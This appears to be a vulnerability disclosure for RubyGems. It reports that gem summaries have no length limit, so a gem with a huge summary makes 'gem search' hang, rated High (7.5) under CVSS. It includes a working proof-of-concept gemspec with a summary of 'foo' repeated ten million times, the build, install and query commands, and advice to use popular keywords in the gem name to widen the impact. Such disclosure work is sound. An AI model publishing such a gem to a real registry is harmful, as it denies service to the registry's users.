Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make gem search
unavailable.
This is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5).
gem search -d <substring-of-the-name-of-the-gem>
, but it will give no response.It may be good for the gem name to include a frequently-searched keyword, such as “foo-rails-bar” or “foo-sinatra-bar”.
Gem::Specification.new do |spec|
spec.name = "huge-summary"
spec.version = "0.0.1"
spec.authors = ["Yusuke Endoh"]
spec.email = ["[email protected]"]
spec.summary = "foo" * 10000000
spec.homepage = "http://example.com/"
spec.license = "MIT"
end
gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem
gem query huge-summary -d
It will not answer.